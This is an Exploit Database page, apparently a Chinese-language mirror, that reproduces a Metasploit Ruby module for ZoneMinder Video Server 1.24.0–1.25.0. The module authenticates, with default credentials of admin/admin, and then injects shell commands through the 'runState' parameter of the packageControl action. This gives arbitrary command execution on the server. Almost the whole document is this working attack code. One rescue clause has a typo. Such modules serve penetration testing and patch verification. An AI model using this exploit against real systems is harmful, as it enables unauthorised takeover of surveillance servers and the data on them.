ZoneMinder Video Server – packageControl Command Execution (Metasploit)

• Exploit Database
• 116 阅读

• 作者： Metasploit
  日期： 2013-01-24
• 类别：

  • remote
  平台：

  • unix
• 来源：https://www.exploit-db.com/exploits/24310/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148

  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient   def initialize(info={}) super(update_info(info, &apos;Name&apos; => &apos;ZoneMinder Video Server packageControl Command Execution&apos;, &apos;Description&apos;=> %q{ This module exploits a command execution vulnerability in ZoneMinder Video Server version 1.24.0 to 1.25.0 which could be abused to allow authenticated users to execute arbitrary commands under the context of the web server user. The &apos;packageControl&apos; function in the &apos;includes/actions.php&apos; file calls &apos;exec()&apos; with user controlled data from the &apos;runState&apos; parameter. }, &apos;References&apos; => [ [&apos;URL&apos;, &apos;http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/&apos;], ], &apos;Author&apos; => [ &apos;Brendan Coles <bcoles[at]gmail.com>&apos;, # Discovery and exploit ], &apos;License&apos;=> MSF_LICENSE, &apos;Privileged&apos; => true, &apos;Arch&apos; => ARCH_CMD, &apos;Platform&apos; => &apos;unix&apos;, &apos;Payload&apos;=> { &apos;BadChars&apos;=> "\x00", &apos;Compat&apos;=> { &apos;PayloadType&apos; => &apos;cmd&apos;, &apos;RequiredCmd&apos; => &apos;generic telnet python perl bash&apos;, }, }, &apos;Targets&apos;=> [ [&apos;Automatic Targeting&apos;, { &apos;auto&apos; => true }] ], &apos;DefaultTarget&apos;=> 0, &apos;DisclosureDate&apos; => "Jan 22 2013", ))   register_options([ OptString.new(&apos;USERNAME&apos;,[true, &apos;The ZoneMinder username&apos;, &apos;admin&apos;]), OptString.new(&apos;PASSWORD&apos;,[true, &apos;The ZoneMinder password&apos;, &apos;admin&apos;]), OptString.new(&apos;TARGETURI&apos;, [true, &apos;The path to the web application&apos;, &apos;/zm/&apos;]) ], self.class) end   def check   peer= "#{rhost}:#{rport}" base= target_uri.path base<< &apos;/&apos; if base[-1, 1] != &apos;/&apos; user= datastore[&apos;USERNAME&apos;] pass= datastore[&apos;PASSWORD&apos;] cookie= "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6) data= "action=login&view=version&username=#{user}&password=#{pass}"   # login and retrieve software version print_status("#{peer} - Authenticating as user &apos;#{user}&apos;") begin res = send_request_cgi({ &apos;method&apos; => &apos;POST&apos;, &apos;uri&apos;=> "#{base}index.php", &apos;cookie&apos; => "#{cookie}", &apos;data&apos; => "#{data}", }) if res and res.code == 200 if res.body =~ /<title>ZM - Login<\/title>/ print_error("#{peer} - Authentication failed") return Exploit::CheckCode::Unknown elsif res.body =~ /v1.2(4\.\d+|5\.0)/ return Exploit::CheckCode::Appears elsif res.body =~ /<title>ZM/ return Exploit::CheckCode::Detected end end return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp print_error("#{peer} - Connection failed") end return Exploit::CheckCode::Unknown   end   def exploit   @peer= "#{rhost}:#{rport}" base = target_uri.path base<< &apos;/&apos; if base[-1, 1] != &apos;/&apos; cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6) user = datastore[&apos;USERNAME&apos;] pass = datastore[&apos;PASSWORD&apos;] data = "action=login&view=postlogin&username=#{user}&password=#{pass}" command= Rex::Text.uri_encode(payload.encoded)   # login print_status("#{@peer} - Authenticating as user &apos;#{user}&apos;") begin res = send_request_cgi({ &apos;method&apos; => &apos;POST&apos;, &apos;uri&apos;=> "#{base}index.php", &apos;cookie&apos; => "#{cookie}", &apos;data&apos; => "#{data}", }) if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/ fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end print_good("#{@peer} - Authenticated successfully")   # send payload print_status("#{@peer} - Sending payload (#{command.length} bytes)") begin res = send_request_cgi({ &apos;method&apos;=> &apos;POST&apos;, &apos;uri&apos; => "#{base}index.php", &apos;data&apos;=> "view=none&action=state&runState=start;#{command}%26", &apos;cookie&apos;=> "#{cookie}" }) if res and res.code == 200 print_good("#{@peer} - Payload sent successfully") else fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end   end   end